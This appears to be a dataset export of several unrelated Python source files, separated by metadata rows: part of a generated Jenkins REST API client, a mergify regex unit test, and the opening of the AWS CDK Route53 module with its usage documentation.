if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/config.xml', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def post_job_delete(self, name, **kwargs): # noqa: E501
"""post_job_delete # noqa: E501
Delete a job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_delete(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_job_delete_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.post_job_delete_with_http_info(name, **kwargs) # noqa: E501
return data
def post_job_delete_with_http_info(self, name, **kwargs): # noqa: E501
"""post_job_delete # noqa: E501
Delete a job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_delete_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', 'jenkins_crumb'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_job_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `post_job_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
if 'jenkins_crumb' in local_var_params:
header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/doDelete', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def post_job_disable(self, name, **kwargs): # noqa: E501
"""post_job_disable # noqa: E501
Disable a job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_disable(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_job_disable_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.post_job_disable_with_http_info(name, **kwargs) # noqa: E501
return data
def post_job_disable_with_http_info(self, name, **kwargs): # noqa: E501
"""post_job_disable # noqa: E501
Disable a job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_disable_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', 'jenkins_crumb'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_job_disable" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `post_job_disable`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
if 'jenkins_crumb' in local_var_params:
header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/disable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def post_job_enable(self, name, **kwargs): # noqa: E501
"""post_job_enable # noqa: E501
Enable a job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_enable(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_job_enable_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.post_job_enable_with_http_info(name, **kwargs) # noqa: E501
return data
def post_job_enable_with_http_info(self, name, **kwargs): # noqa: E501
"""post_job_enable # noqa: E501
Enable a job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_enable_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', 'jenkins_crumb'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_job_enable" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `post_job_enable`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
if 'jenkins_crumb' in local_var_params:
header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/enable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def post_job_last_build_stop(self, name, **kwargs): # noqa: E501
"""post_job_last_build_stop # noqa: E501
Stop a job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_last_build_stop(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_job_last_build_stop_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.post_job_last_build_stop_with_http_info(name, **kwargs) # noqa: E501
return data
def post_job_last_build_stop_with_http_info(self, name, **kwargs): # noqa: E501
"""post_job_last_build_stop # noqa: E501
Stop a job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_last_build_stop_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', 'jenkins_crumb'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_job_last_build_stop" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `post_job_last_build_stop`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
if 'jenkins_crumb' in local_var_params:
header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/lastBuild/stop', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def post_view_config(self, name, body, **kwargs): # noqa: E501
"""post_view_config # noqa: E501
Update view configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_view_config(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the view (required)
:param str body: View configuration in config.xml format (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_view_config_with_http_info(name, body, **kwargs) # noqa: E501
else:
(data) = self.post_view_config_with_http_info(name, body, **kwargs) # noqa: E501
return data
def post_view_config_with_http_info(self, name, body, **kwargs): # noqa: E501
"""post_view_config # noqa: E501
Update view configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_view_config_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the view (required)
:param str body: View configuration in config.xml format (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', 'body', 'jenkins_crumb'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_view_config" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `post_view_config`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in local_var_params or
local_var_params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_view_config`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
if 'jenkins_crumb' in local_var_params:
header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/view/{name}/config.xml', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 39.252595 | 125 | 0.609347 | 9,464 | 79,408 | 4.821746 | 0.021027 | 0.0561 | 0.085903 | 0.031556 | 0.976158 | 0.9739 | 0.97138 | 0.963031 | 0.955208 | 0.951482 | 0 | 0.017375 | 0.302048 | 79,408 | 2,022 | 126 | 39.272008 | 0.805983 | 0.312072 | 0 | 0.815668 | 1 | 0 | 0.169444 | 0.03408 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037788 | false | 0 | 0.003687 | 0 | 0.097696 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
248d0c8884d30a74aa35fc33986639f25be0155b | 1,001 | py | Python | mergify_engine/tests/unit/test_misc.py | Madhu-1/mergify-engine | 9ca4f4697cc825230b1584f5587f10393cabc971 | [
"Apache-2.0"
] | null | null | null | mergify_engine/tests/unit/test_misc.py | Madhu-1/mergify-engine | 9ca4f4697cc825230b1584f5587f10393cabc971 | [
"Apache-2.0"
] | null | null | null | mergify_engine/tests/unit/test_misc.py | Madhu-1/mergify-engine | 9ca4f4697cc825230b1584f5587f10393cabc971 | [
"Apache-2.0"
] | null | null | null | from mergify_engine import SINGLE_PULL_API_RE
def test_simple_pull_re():
assert not SINGLE_PULL_API_RE.match("https://foorbar:443/")
assert not SINGLE_PULL_API_RE.match("https://api.github.com:443/orgs/foobar")
assert not SINGLE_PULL_API_RE.match("https://api.github.com:443/repos/foo/bar")
assert not SINGLE_PULL_API_RE.match(
"https://api.github.com:443/repos/foo/bar/pulls"
)
assert (
SINGLE_PULL_API_RE.match("https://api.github.com:443/repos/foo/bar/pulls/1")
is not None
)
assert (
SINGLE_PULL_API_RE.match("https://api.github.com:443/repos/foo/bar/pulls/123")
is not None
)
assert not SINGLE_PULL_API_RE.match(
"https://api.github.com:443/repos/foo/bar/pulls/abc"
)
assert not SINGLE_PULL_API_RE.match(
"https://api.github.com:443/repos/foo/bar/pulls/123/commits"
)
assert not SINGLE_PULL_API_RE.match(
"https://api.github.com:443/repos/foo/bar/pulls/123/commits/1"
)
| 35.75 | 86 | 0.683317 | 160 | 1,001 | 4.0625 | 0.19375 | 0.153846 | 0.2 | 0.230769 | 0.846154 | 0.846154 | 0.846154 | 0.846154 | 0.793846 | 0.793846 | 0 | 0.046005 | 0.174825 | 1,001 | 27 | 87 | 37.074074 | 0.74092 | 0 | 0 | 0.32 | 0 | 0.08 | 0.40959 | 0 | 0 | 0 | 0 | 0 | 0.36 | 1 | 0.04 | true | 0 | 0.04 | 0 | 0.08 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
24f831aa5b68cb3359e438825bc08e82d47741be | 253,778 | py | Python | .env/lib/python3.8/site-packages/aws_cdk/aws_route53/__init__.py | careck/begariver-cdk | 5b88f82ae545e374712521b2eb6412c2e2a30e6a | [
"MIT"
] | null | null | null | .env/lib/python3.8/site-packages/aws_cdk/aws_route53/__init__.py | careck/begariver-cdk | 5b88f82ae545e374712521b2eb6412c2e2a30e6a | [
"MIT"
] | null | null | null | .env/lib/python3.8/site-packages/aws_cdk/aws_route53/__init__.py | careck/begariver-cdk | 5b88f82ae545e374712521b2eb6412c2e2a30e6a | [
"MIT"
] | null | null | null | '''
# Amazon Route53 Construct Library
<!--BEGIN STABILITY BANNER-->---


---
<!--END STABILITY BANNER-->
To add a public hosted zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
route53.PublicHostedZone(self, "HostedZone",
zone_name="fully.qualified.domain.com"
)
```
To add a private hosted zone, use `PrivateHostedZone`. Note that
`enableDnsHostnames` and `enableDnsSupport` must have been enabled for the
VPC you're configuring for private hosted zones.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_ec2 as ec2
import aws_cdk.aws_route53 as route53
vpc = ec2.Vpc(self, "VPC")
zone = route53.PrivateHostedZone(self, "HostedZone",
zone_name="fully.qualified.domain.com",
vpc=vpc
)
```
Additional VPCs can be added with `zone.addVpc()`.
## Adding Records
To add a TXT record to your zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
route53.TxtRecord(self, "TXTRecord",
zone=my_zone,
record_name="_foo", # If the name ends with a ".", it will be used as-is;
# if it ends with a "." followed by the zone name, a trailing "." will be added automatically;
# otherwise, a ".", the zone name, and a trailing "." will be added automatically.
# Defaults to zone root if not specified.
values=["Bar!", "Baz?"],
ttl=Duration.minutes(90)
)
```
To add a NS record to your zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
route53.NsRecord(self, "NSRecord",
zone=my_zone,
record_name="foo",
values=["ns-1.awsdns.co.uk.", "ns-2.awsdns.com."
],
ttl=Duration.minutes(90)
)
```
To add a DS record to your zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
route53.DsRecord(self, "DSRecord",
zone=my_zone,
record_name="foo",
values=["12345 3 1 123456789abcdef67890123456789abcdef67890"
],
ttl=Duration.minutes(90)
)
```
To add an A record to your zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
route53.ARecord(self, "ARecord",
zone=my_zone,
target=route53.RecordTarget.from_ip_addresses("1.2.3.4", "5.6.7.8")
)
```
To add an A record for an EC2 instance with an Elastic IP (EIP) to your zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_ec2 as ec2
import aws_cdk.aws_route53 as route53
instance = ec2.Instance(self, "Instance", {})
elastic_ip = ec2.CfnEIP(self, "EIP",
domain="vpc",
instance_id=instance.instance_id
)
route53.ARecord(self, "ARecord",
zone=my_zone,
target=route53.RecordTarget.from_ip_addresses(elastic_ip.ref)
)
```
To add an AAAA record pointing to a CloudFront distribution:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
import aws_cdk.aws_route53_targets as targets
route53.AaaaRecord(self, "Alias",
zone=my_zone,
target=route53.RecordTarget.from_alias(targets.CloudFrontTarget(distribution))
)
```
Constructs are available for A, AAAA, CAA, CNAME, MX, NS, SRV and TXT records.
Use the `CaaAmazonRecord` construct to easily restrict certificate authorities
allowed to issue certificates for a domain to Amazon only.
To add a NS record to a HostedZone in different account you can do the following:
In the account containing the parent hosted zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
parent_zone = route53.PublicHostedZone(self, "HostedZone",
zone_name="someexample.com",
cross_account_zone_delegation_principal=iam.AccountPrincipal("12345678901"),
cross_account_zone_delegation_role_name="MyDelegationRole"
)
```
In the account containing the child zone to be delegated:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_iam as iam
import aws_cdk.aws_route53 as route53
sub_zone = route53.PublicHostedZone(self, "SubZone",
zone_name="sub.someexample.com"
)
# import the delegation role by constructing the roleArn
delegation_role_arn = Stack.of(self).format_arn(
region="", # IAM is global in each partition
service="iam",
account="parent-account-id",
resource="role",
resource_name="MyDelegationRole"
)
delegation_role = iam.Role.from_role_arn(self, "DelegationRole", delegation_role_arn)
# create the record
route53.CrossAccountZoneDelegationRecord(self, "delegate",
delegated_zone=sub_zone,
parent_hosted_zone_name="someexample.com", # or you can use parentHostedZoneId
delegation_role=delegation_role
)
```
## Imports
If you don't know the ID of the Hosted Zone to import, you can use the
`HostedZone.fromLookup`:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
HostedZone.from_lookup(self, "MyZone",
domain_name="example.com"
)
```
`HostedZone.fromLookup` requires an environment to be configured. Check
out the [documentation](https://docs.aws.amazon.com/cdk/latest/guide/environments.html) for more documentation and examples. CDK
automatically looks into your `~/.aws/config` file for the `[default]` profile.
If you want to specify a different account run `cdk deploy --profile [profile]`.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
MyDevStack(app, "dev",
env={
"account": process.env.CDK_DEFAULT_ACCOUNT,
"region": process.env.CDK_DEFAULT_REGION
}
)
```
If you know the ID and Name of a Hosted Zone, you can import it directly:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
zone = HostedZone.from_hosted_zone_attributes(self, "MyZone",
zone_name="example.com",
hosted_zone_id="ZOJJZC49E0EPZ"
)
```
Alternatively, use the `HostedZone.fromHostedZoneId` to import hosted zones if
you know the ID and the retrieval for the `zoneName` is undesirable.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
zone = HostedZone.from_hosted_zone_id(self, "MyZone", "ZOJJZC49E0EPZ")
```
## VPC Endpoint Service Private DNS
When you create a VPC endpoint service, AWS generates endpoint-specific DNS hostnames that consumers use to communicate with the service.
For example, vpce-1234-abcdev-us-east-1.vpce-svc-123345.us-east-1.vpce.amazonaws.com.
By default, your consumers access the service with that DNS name.
This can cause problems with HTTPS traffic because the DNS will not match the backend certificate:
```console
curl: (60) SSL: no alternative certificate subject name matches target host name 'vpce-abcdefghijklmnopq-rstuvwx.vpce-svc-abcdefghijklmnopq.us-east-1.vpce.amazonaws.com'
```
Effectively, the endpoint appears untrustworthy. To mitigate this, clients have to create an alias for this DNS name in Route53.
Private DNS for an endpoint service lets you configure a private DNS name so consumers can
access the service using an existing DNS name without creating this Route53 DNS alias
This DNS name can also be guaranteed to match up with the backend certificate.
Before consumers can use the private DNS name, you must verify that you have control of the domain/subdomain.
Assuming your account has ownership of the particular domain/subdomain,
this construct sets up the private DNS configuration on the endpoint service,
creates all the necessary Route53 entries, and verifies domain ownership.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
from aws_cdk.core import Stack
from aws_cdk.aws_ec2 import Vpc, VpcEndpointService
from aws_cdk.aws_elasticloadbalancingv2 import NetworkLoadBalancer
from aws_cdk.aws_route53 import PublicHostedZone
stack = Stack()
vpc = Vpc(stack, "VPC")
nlb = NetworkLoadBalancer(stack, "NLB",
vpc=vpc
)
vpces = VpcEndpointService(stack, "VPCES",
vpc_endpoint_service_load_balancers=[nlb]
)
# You must use a public hosted zone so domain ownership can be verified
zone = PublicHostedZone(stack, "PHZ",
zone_name="aws-cdk.dev"
)
VpcEndpointServiceDomainName(stack, "EndpointDomain",
endpoint_service=vpces,
domain_name="my-stuff.aws-cdk.dev",
public_hosted_zone=zone
)
```
'''
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from ._jsii import *
import aws_cdk.aws_ec2
import aws_cdk.aws_iam
import aws_cdk.core
import constructs
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.AliasRecordTargetConfig",
jsii_struct_bases=[],
name_mapping={"dns_name": "dnsName", "hosted_zone_id": "hostedZoneId"},
)
class AliasRecordTargetConfig:
def __init__(self, *, dns_name: builtins.str, hosted_zone_id: builtins.str) -> None:
'''Represents the properties of an alias target destination.
:param dns_name: DNS name of the target.
:param hosted_zone_id: Hosted zone ID of the target.
'''
self._values: typing.Dict[str, typing.Any] = {
"dns_name": dns_name,
"hosted_zone_id": hosted_zone_id,
}
@builtins.property
def dns_name(self) -> builtins.str:
'''DNS name of the target.'''
result = self._values.get("dns_name")
assert result is not None, "Required property 'dns_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def hosted_zone_id(self) -> builtins.str:
'''Hosted zone ID of the target.'''
result = self._values.get("hosted_zone_id")
assert result is not None, "Required property 'hosted_zone_id' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "AliasRecordTargetConfig(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CaaRecordValue",
jsii_struct_bases=[],
name_mapping={"flag": "flag", "tag": "tag", "value": "value"},
)
class CaaRecordValue:
def __init__(
self,
*,
flag: jsii.Number,
tag: "CaaTag",
value: builtins.str,
) -> None:
'''Properties for a CAA record value.
:param flag: The flag.
:param tag: The tag.
:param value: The value associated with the tag.
'''
self._values: typing.Dict[str, typing.Any] = {
"flag": flag,
"tag": tag,
"value": value,
}
@builtins.property
def flag(self) -> jsii.Number:
'''The flag.'''
result = self._values.get("flag")
assert result is not None, "Required property 'flag' is missing"
return typing.cast(jsii.Number, result)
@builtins.property
def tag(self) -> "CaaTag":
'''The tag.'''
result = self._values.get("tag")
assert result is not None, "Required property 'tag' is missing"
return typing.cast("CaaTag", result)
@builtins.property
def value(self) -> builtins.str:
'''The value associated with the tag.'''
result = self._values.get("value")
assert result is not None, "Required property 'value' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CaaRecordValue(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.enum(jsii_type="@aws-cdk/aws-route53.CaaTag")
class CaaTag(enum.Enum):
'''The CAA tag.'''
ISSUE = "ISSUE"
'''Explicity authorizes a single certificate authority to issue a certificate (any type) for the hostname.'''
ISSUEWILD = "ISSUEWILD"
'''Explicity authorizes a single certificate authority to issue a wildcard certificate (and only wildcard) for the hostname.'''
IODEF = "IODEF"
'''Specifies a URL to which a certificate authority may report policy violations.'''
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDNSSEC(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CfnDNSSEC",
):
'''A CloudFormation ``AWS::Route53::DNSSEC``.
:cloudformationResource: AWS::Route53::DNSSEC
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-dnssec.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
hosted_zone_id: builtins.str,
) -> None:
'''Create a new ``AWS::Route53::DNSSEC``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param hosted_zone_id: ``AWS::Route53::DNSSEC.HostedZoneId``.
'''
props = CfnDNSSECProps(hosted_zone_id=hosted_zone_id)
jsii.create(CfnDNSSEC, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> builtins.str:
'''``AWS::Route53::DNSSEC.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-dnssec.html#cfn-route53-dnssec-hostedzoneid
'''
return typing.cast(builtins.str, jsii.get(self, "hostedZoneId"))
@hosted_zone_id.setter
def hosted_zone_id(self, value: builtins.str) -> None:
jsii.set(self, "hostedZoneId", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnDNSSECProps",
jsii_struct_bases=[],
